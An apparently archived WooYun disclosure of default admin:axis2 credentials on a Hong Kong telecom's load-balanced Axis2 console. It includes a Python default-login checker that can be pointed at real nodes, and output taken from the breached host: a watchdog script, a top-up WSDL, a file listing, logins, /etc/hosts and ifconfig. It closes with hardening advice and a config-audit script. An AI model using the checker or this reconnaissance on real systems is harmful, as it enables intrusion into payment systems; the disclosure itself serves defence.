WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-10-09: Details sent to the vendor, awaiting the vendor's response
2015-10-12: Vendor confirmed the issue; details visible to the vendor only
2015-10-22: Details disclosed to core white hats and experts in the relevant field
2015-10-26: Vendor fixed the vulnerability and disclosed it voluntarily; details made public
A system of HKT (Hong Kong Telecom, a PCCW subsidiary) is vulnerable. It covers mobile phone authentication and value-added services, and indirect use of it gives control over systems such as telecom stored-value (prepaid) card management. The backend is a load-balanced cluster, so several servers are affected.
#1 Vulnerable address
http://**.**.**.**/axis2/**.**.**.** sits behind a load balancer; the backend pool contains several servers: **.**.**.** **.**.**.** **.**.**.** **.**.**.**
Other address of the same system: https://**.**.**.**/login
#2 Axis2 admin console on the default credentials admin:axis2 (the values shipped in conf/axis2.xml). The console lets whoever logs in upload a service archive (.aar) that the running engine loads, so a default password here is effectively code execution as the servlet container's user.
#3 Getting a shell on the system
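The check behind steps #2 and #3, written out as an added example (this is not the reporter's tooling). It assumes the layout of the Axis2 1.x admin module: the login form posts userName and password to <base>/axis2/axis2-admin/login, the console page after a valid login carries the banner in SUCCESS_MARKER, and a rejected login returns the FAILURE_MARKER text; both marker strings are assumptions kept as constants so they can be corrected after one manual login. Because the target is a load-balanced pool, the check is run against every backend node, not only the balanced name. The transport is injected, so the logic runs offline against constructed responses; the 10.0.0.x node addresses are made up for the demonstration.

```python
"""Default-credential check for the Axis2 web admin console.

Added example; not the reporter's tooling. Assumed Axis2 1.x admin-module layout:
POST userName/password to <base>/axis2/axis2-admin/login, SUCCESS_MARKER on the
console page after a valid login, FAILURE_MARKER on a rejected one. The HTTP
transport is injected so the logic runs offline against fake_post(); the
10.0.0.x nodes below are constructed, not the report's hosts.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

LOGIN_PATH = "/axis2/axis2-admin/login"
DEFAULT_CREDS = [("admin", "axis2")]                  # shipped in conf/axis2.xml
SUCCESS_MARKER = "Welcome to Axis2 Web Admin Module"  # assumed banner text
FAILURE_MARKER = "Invalid auth credentials!"          # assumed error text

# transport signature: (url, form fields) -> (status, body)
PostFn = Callable[[str, Dict[str, str]], Tuple[int, str]]


def urllib_post(url: str, fields: Dict[str, str], timeout: float = 10.0) -> Tuple[int, str]:
    """Live transport: form-encoded POST using only the standard library."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify(status: int, body: str) -> str:
    """Map one login response to 'success', 'failure' or 'unknown'."""
    if status == 200 and SUCCESS_MARKER in body:
        return "success"
    if FAILURE_MARKER in body:
        return "failure"
    return "unknown"


def try_login(base: str, user: str, password: str, post: PostFn) -> str:
    url = base.rstrip("/") + LOGIN_PATH
    status, body = post(url, {"userName": user, "password": password, "submit": " Login "})
    return classify(status, body)


def check_nodes(nodes: List[str], post: PostFn, creds=DEFAULT_CREDS) -> Dict[str, str]:
    """Test every backend directly rather than only the balanced name: a single
    node still on the shipped password is enough for an attacker, and a fixed
    node that happens to answer the VIP would otherwise hide it.
    Returns node -> 'user:pass' for a working default, '' when none worked."""
    result: Dict[str, str] = {}
    for node in nodes:
        result[node] = ""
        for user, password in creds:
            if try_login(node, user, password, post) == "success":
                result[node] = f"{user}:{password}"
                break
    return result


# --- constructed fixture: two backend nodes, one still on the default ---------
FAKE_NODES = {
    "http://10.0.0.11:8080": "admin:axis2",            # unchanged since install
    "http://10.0.0.12:8080": "admin:Xk7$longer-pass",  # already rotated
}


def fake_post(url: str, fields: Dict[str, str]) -> Tuple[int, str]:
    """Offline stand-in for urllib_post that answers like the admin console."""
    base = url[: -len(LOGIN_PATH)]
    if f"{fields['userName']}:{fields['password']}" == FAKE_NODES.get(base):
        return 200, f"<html><body><h1>{SUCCESS_MARKER}</h1></body></html>"
    return 200, f"<html><body><p>{FAILURE_MARKER}</p></body></html>"


if __name__ == "__main__":
    for node, hit in check_nodes(sorted(FAKE_NODES), fake_post).items():
        print(f"{node}: {'DEFAULT CREDENTIALS ' + hit if hit else 'ok'}")
```

To run it against a real pool, pass `urllib_post` instead of `fake_post` and the backend base URLs in place of `FAKE_NODES`; a result of `unknown` on every node usually means the marker strings need adjusting for that Axis2 build.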
#4 The payment service
Restart watchdog found on the server (line breaks restored; the closing fi was cut off in the capture). If Tomcat listens on 8080 and the /opt/bpp/tomcat process exists, it starts the payment client as user tomcat:

    if netstat -an | grep ":8080" | grep LISTEN > /dev/null && ps -ef | grep /opt/bpp/tomcat | grep -v "grep" > /dev/null
    then
        echo "Start Payment Client Application on " `hostname` " at " `date` >> $RESTART_LOG 2>&1
        cd /
        su - tomcat -c "/home/oper/linux/payment_start.sh"
    else
        echo "Tomcat is NOT RUNNING" >> $RESTART_LOG 2>&1
    fi

Note the `su - tomcat`: the watchdog itself runs as root, while the payment client it launches runs as tomcat.
#5 Other services belonging to this system
WSDL of the MonitiseServices service, as captured in the report (cut in several places, marked with ...). The visible validateTopup operation takes a MonitiseInputDTO carrying channel, msisdn, starterPackId, topupAmount and transactionId, i.e. a mobile top-up validation keyed by phone number and amount:

<wsdl:definitions xmlns:wsdl="http://**.**.**.**/wsdl/" xmlns:ns1="http://org.apache.axis2/xsd" xmlns:ns="http://**.**.**.**" xmlns:ax27="http://**.**.**.**/xsd" xmlns:wsaw="http://**.**.**.**/2006/05/addressing/wsdl" xmlns:ax25="http://**.**.**.**/xsd" xmlns:http="http://**.**.**.**/wsdl/http/" xmlns:xs="http://**.**.**.**/2001/XMLSchema" xmlns:mime="http://**.**.**.**/wsdl/mime/" xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:soap12="http://**.**.**.**/wsdl/soap12/" targetNamespace="http://**.**.**.**">
  <wsdl:documentation>MonitiseServices</wsdl:documentation>
  <wsdl:types>
    <xs:schema attributeFormDefault="qualified" elementFormDefault="qualified" targetNamespace="http://**.**.**.**/xsd">
      <xs:complexType name="MonitiseAccountValidateOutputDTO">
        <xs:sequence>
          ...
        </xs:sequence>
      </xs:complexType>
    </xs:schema>
    <xs:schema attributeFormDefault="qualified" elementFormDefault="qualified" targetNamespace="http://**.**.**.**/xsd">
      <xs:complexType name="MonitiseInputDTO">
        <xs:sequence>
          <xs:element minOccurs="0" name="channel" nillable="true" type="xs:string"/>
          <xs:element minOccurs="0" name="msisdn" nillable="true" type="xs:string"/>
          <xs:element minOccurs="0" name="starterPackId" nillable="true" type="xs:string"/>
          <xs:element minOccurs="0" name="topupAmount" type="xs:float"/>
          <xs:element minOccurs="0" name="transactionId" nillable="true" type="xs:string"/>
        </xs:sequence>
      </xs:complexType>
    </xs:schema>
    <xs:schema xmlns:ax28="http://**.**.**.**/xsd" xmlns:ax26="http://**.**.**.**/xsd" attributeFormDefault="qualified" elementFormDefault="qualified" targetNamespace="http://**.**.**.**">
      <xs:import namespace="http://**.**.**.**/xsd"/>
      <xs:import namespace="http://**.**.**.**/xsd"/>
      <xs:element name="validateTopup">
        <xs:complexType>
          <xs:sequence>
            ...
          </xs:sequence>
        </xs:complexType>
      </xs:element>
      ...
    </xs:schema>
  </wsdl:types>
  ...
      <http:address location="http://**.**.**.**/axis2/services/MonitiseServices.MonitiseServicesHttpEndpoint/"/>
    </wsdl:port>
  </wsdl:service>
</wsdl:definitions>
Directory listing from the shell. The application's Java source is deployed next to the compiled classes, and the action names cover login, password reset, VAS changes and online, voucher and Alipay top-up:

drwxr-x--- 2 tomcat tomcat  4096 Jul  7 2014 .
drwxr-x--- 5 tomcat tomcat  4096 Jul  7 2014 ..
-rw-r----- 1 tomcat tomcat 15840 Jun 30 2014 AccumulativeChrgSumyAction.class
-rw-r----- 1 tomcat tomcat 19122 Apr 23 2014 AccumulativeChrgSumyAction.java
-rw-r----- 1 tomcat tomcat  2057 Jun 30 2014 ActionConstant.class
-rw-r----- 1 tomcat tomcat  2154 Nov 12 2013 ActionConstant.java
-rw-r----- 1 tomcat tomcat  1267 Jul  4 2014 AlipayTopupAction$1.class
-rw-r----- 1 tomcat tomcat 27144 Jul  4 2014 AlipayTopupAction.class
-rw-r----- 1 tomcat tomcat 36573 Jul  4 2014 AlipayTopupAction.java
-rw-r----- 1 tomcat tomcat  1248 Jul  4 2014 AlipayTopupAction$miTM.class
-rw-r----- 1 tomcat tomcat  4557 Jun 30 2014 AutoLogonAction.class
-rw-r----- 1 tomcat tomcat  4187 Feb  6 2014 AutoLogonAction.java
-rw-r----- 1 tomcat tomcat  1182 Jun 30 2014 CardInfoAction.class
-rw-r----- 1 tomcat tomcat   544 Nov 12 2013 CardInfoAction.java
-rw-r----- 1 tomcat tomcat  7788 Jun 30 2014 CardInformationAction.class
-rw-r----- 1 tomcat tomcat  6984 Nov 12 2013 CardInformationAction.java
-rw-r----- 1 tomcat tomcat  5483 Jun 30 2014 ChangePasswordAction.class
-rw-r----- 1 tomcat tomcat  5525 Nov 27 2013 ChangePasswordAction.java
-rw-r----- 1 tomcat tomcat 10347 Jun 30 2014 ChangeVasAction.class
-rw-r----- 1 tomcat tomcat  9418 Nov 28 2013 ChangeVasAction.java
-rw-r----- 1 tomcat tomcat  4976 Jun 30 2014 ForgetPasswordAction.class
-rw-r----- 1 tomcat tomcat  4419 Feb 17 2014 ForgetPasswordAction.java
-rw-r----- 1 tomcat tomcat  2040 Jun 30 2014 LogonAction.class
-rw-r----- 1 tomcat tomcat  1563 Nov 12 2013 LogonAction.java
-rw-r----- 1 tomcat tomcat   682 Jun 30 2014 LogoutAction.class
-rw-r----- 1 tomcat tomcat   384 Nov 12 2013 LogoutAction.java
-rw-r----- 1 tomcat tomcat  6984 Jun 30 2014 ManualLoginAction.class
-rw-r----- 1 tomcat tomcat  6165 Jan  3 2014 ManualLoginAction.java
-rw-r----- 1 tomcat tomcat   596 Jun 30 2014 MessageAction.class
-rw-r----- 1 tomcat tomcat   304 Nov 12 2013 MessageAction.java
-rw-r----- 1 tomcat tomcat  4936 Jun 30 2014 NEAction.class
-rw-r----- 1 tomcat tomcat  5319 Jun 18 2014 NEAction.java
-rw-r----- 1 tomcat tomcat 20582 Jun 30 2014 OnlineTopupAction.class
-rw-r----- 1 tomcat tomcat 22270 Jun 18 2014 OnlineTopupAction.java
-rw-r----- 1 tomcat tomcat  2341 Jun 30 2014 PropertiesAction.class
-rw-r----- 1 tomcat tomcat  1768 Nov 12 2013 PropertiesAction.java
-rw-r----- 1 tomcat tomcat  4213 Jun 30 2014 RetrievePasswordAction.class
-rw-r----- 1 tomcat tomcat  4092 Nov 27 2013 RetrievePasswordAction.java
-rw-r----- 1 tomcat tomcat  1357 Jun 30 2014 SmsHistoryAction.class
-rw-r----- 1 tomcat tomcat   766 Nov 12 2013 SmsHistoryAction.java
-rw-r----- 1 tomcat tomcat 11972 Jun 30 2014 SmsSettingAction.class
-rw-r----- 1 tomcat tomcat 13075 Nov 27 2013 SmsSettingAction.java
-rw-r----- 1 tomcat tomcat  1693 Jun 30 2014 TestDisplayAction.class
-rw-r----- 1 tomcat tomcat   932 Nov 12 2013 TestDisplayAction.java
-rw-r----- 1 tomcat tomcat  2757 Jun 30 2014 TestUpdateAction.class
-rw-r----- 1 tomcat tomcat  2615 Nov 27 2013 TestUpdateAction.java
-rw-r----- 1 tomcat tomcat  4475 Jun 30 2014 UsageEntitlementAction.class
-rw-r----- 1 tomcat tomcat  3831 Nov 27 2013 UsageEntitlementAction.java
-rw-r----- 1 tomcat tomcat  2082 Jun 30 2014 VasAction.class
-rw-r----- 1 tomcat tomcat  1395 Nov 27 2013 VasAction.java
-rw-r----- 1 tomcat tomcat 16554 Jun 30 2014 VoucherOnlineTopupAction.class
-rw-r----- 1 tomcat tomcat 25868 Feb 17 2014 VoucherOnlineTopupAction.java
Recent logins on the host (last -20):

sitescop pts/2 **.**.**.** Fri Oct  9 10:50   still logged in
sitescop pts/0 **.**.**.** Fri Oct  9 10:20   still logged in
sitescop pts/6 **.**.**.** Fri Oct  9 10:00   still logged in
sitescop pts/2 **.**.**.** Fri Oct  9 09:45 - 10:45  (00:59)
sitescop pts/0 **.**.**.** Fri Oct  9 09:00 - 10:10  (01:09)
sitescop pts/6 **.**.**.** Fri Oct  9 01:25 - 09:55  (08:30)
sitescop pts/5 **.**.**.** Fri Oct  9 01:24   still logged in
sitescop pts/2 **.**.**.** Fri Oct  9 01:20 - 09:35  (08:14)
sitescop pts/4 **.**.**.** Fri Oct  9 01:20   still logged in
sitescop pts/3 **.**.**.** Fri Oct  9 01:18   still logged in
sitescop pts/2 **.**.**.** Fri Oct  9 01:18 - 01:20  (00:01)
sitescop pts/3 **.**.**.** Fri Oct  9 01:18 - 01:18  (00:00)
sitescop pts/5 **.**.**.** Fri Oct  9 01:18 - 01:19  (00:01)
sitescop pts/2 **.**.**.** Fri Oct  9 01:18 - 01:18  (00:00)
sitescop pts/0 **.**.**.** Fri Oct  9 01:18 - 08:55  (07:37)
sitescop pts/5 **.**.**.** Wed Oct  7 04:00 - 01:15  (1+21:15)
sitescop pts/4 **.**.**.** Wed Oct  7 03:45 - 01:18  (1+21:33)
sitescop pts/6 **.**.**.** Wed Oct  7 02:45 - 01:18  (1+22:33)
cspsbat  pts/7 hp90        Tue Oct  6 15:01 - 15:36  (00:34)
sitescop pts/3 **.**.**.** Tue Oct  6 05:13 - 01:14  (2+20:00)
/etc/hosts, naming the other hosts in the environment:

# Do not remove the following line, or various programs
# that require network functionality will fail.
**.**.**.**   localhost.localdomain localhost
::1           localhost6.localdomain6 localhost6
**.**.**.**   **.**.**.**
**.**.**.**   lx23 LX23 xhkalx23 XHKALX23
**.**.**.**   hp90 HP90 xhkahp90 XHKAHP90
**.**.**.**   hp91 HP91 xhkahp91 XHKAHP91
**.**.**.**   lx39 LX39 xhkalx39 XHKALX39
**.**.**.**   lx40 LX40 xhkalx40 XHKALX40
**.**.**.**   lx49 LX49 xhkalx49 XHKALX49
**.**.**.**   lx50 LX50 xhkalx50 XHKALX50
**.**.**.**   NTSYSA16 ntsysa16
**.**.**.**   **.**.**.**
ifconfig
eth0      Link encap:Ethernet  HWaddr E4:1F:13:67:3E:1C
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::e61f:13ff:fe67:3e1c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2738312948 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2278510958 errors:67591190 dropped:0 overruns:0 carrier:67591190
          collisions:80445229 txqueuelen:1000
          RX bytes:358356022427 (333.7 GiB)  TX bytes:1627045472176 (1.4 TiB)
          Interrupt:169 Memory:a6000000-a6012800

eth1      Link encap:Ethernet  HWaddr E4:1F:13:67:3E:1E
          inet addr:**.**.**.**  Bcast:**.**.**.**55  Mask:**.**.**.**
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
#1 Remove middleware that is not needed
#2 Avoid default configurations
#3 Avoid weak passwords
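A way to verify fixes #2 and #3 on each node of the pool, as an added example (not the vendor's remediation). It checks the two files as Axis2 ships them: conf/axis2.xml holds the console login as <parameter name="userName"> and <parameter name="password"> under <axisconfig>, and the webapp's WEB-INF/web.xml maps org.apache.axis2.webapp.AxisAdminServlet to /axis2-admin/*, so removing that servlet and its mapping is what fix #1 means for an installation that never uses the console. The minimum password length is a local policy assumption, and the WEAK_* / HARDENED_* documents are constructed fragments placed side by side, not copies from the affected hosts.

```python
"""Config audit for the Axis2 admin console: shipped credentials in
conf/axis2.xml and a still-deployed AxisAdminServlet in WEB-INF/web.xml.

Added example, not the vendor's fix. Relies only on the shipped layout of the
two files; MIN_PASSWORD_LEN is a local policy assumption and the sample
documents at the bottom are constructed, not captured from the report's hosts.
"""
import xml.etree.ElementTree as ET
from typing import List

DEFAULT_USER, DEFAULT_PASS = "admin", "axis2"
ADMIN_SERVLET = "org.apache.axis2.webapp.AxisAdminServlet"
MIN_PASSWORD_LEN = 16  # local policy assumption


def _ns(root: ET.Element) -> str:
    """Namespace in ElementTree's '{uri}' form, '' when the file declares none."""
    return root.tag[: root.tag.index("}") + 1] if root.tag.startswith("{") else ""


def audit_axis2_xml(text: str) -> List[str]:
    """Findings for the admin-console credentials in axis2.xml."""
    root = ET.fromstring(text)
    params = {p.get("name"): (p.text or "").strip() for p in root.iter("parameter")}
    user, password = params.get("userName", ""), params.get("password", "")
    findings: List[str] = []
    if (user, password) == (DEFAULT_USER, DEFAULT_PASS):
        findings.append("axis2.xml: admin console still uses the shipped admin:axis2")
    elif len(password) < MIN_PASSWORD_LEN:
        findings.append(f"axis2.xml: admin password shorter than {MIN_PASSWORD_LEN} characters")
    return findings


def audit_web_xml(text: str) -> List[str]:
    """Findings for an admin console that is still deployed in web.xml."""
    root = ET.fromstring(text)
    ns = _ns(root)
    findings: List[str] = []
    for servlet in root.iter(f"{ns}servlet"):
        if servlet.findtext(f"{ns}servlet-class", "").strip() == ADMIN_SERVLET:
            name = servlet.findtext(f"{ns}servlet-name", "").strip()
            findings.append(f"web.xml: admin console servlet '{name}' is still deployed")
    return findings


def audit(axis2_xml: str, web_xml: str) -> List[str]:
    """Combined findings for one node; an empty list means both fixes are in."""
    return audit_axis2_xml(axis2_xml) + audit_web_xml(web_xml)


# --- constructed fragments: the weak setting beside the corrected one ---------
WEAK_AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
</axisconfig>"""

HARDENED_AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">svc-axis-admin</parameter>
    <parameter name="password">q7V!m2Lz9#pR4wXe8Tg</parameter>
</axisconfig>"""

WEAK_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
    <servlet>
        <servlet-name>AxisServlet</servlet-name>
        <servlet-class>org.apache.axis2.transport.http.AxisServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>AxisAdminServlet</servlet-name>
        <servlet-class>org.apache.axis2.webapp.AxisAdminServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>AxisAdminServlet</servlet-name>
        <url-pattern>/axis2-admin/*</url-pattern>
    </servlet-mapping>
</web-app>"""

# admin servlet and its mapping removed; only the service endpoint stays
HARDENED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
    <servlet>
        <servlet-name>AxisServlet</servlet-name>
        <servlet-class>org.apache.axis2.transport.http.AxisServlet</servlet-class>
    </servlet>
</web-app>"""


if __name__ == "__main__":
    for label, cfg in (("weak", (WEAK_AXIS2_XML, WEAK_WEB_XML)),
                       ("hardened", (HARDENED_AXIS2_XML, HARDENED_WEB_XML))):
        print(label, audit(*cfg) or ["no findings"])
```

Run it with the real files read from each backend node; in a load-balanced cluster the finding that matters is any node that still reports something, since one unfixed member is enough to reopen the path described above.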
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-10-12 14:05
The incident has been reported to the relevant organisation.
2015-10-26: The relevant organisation reports that the vulnerability has been fixed.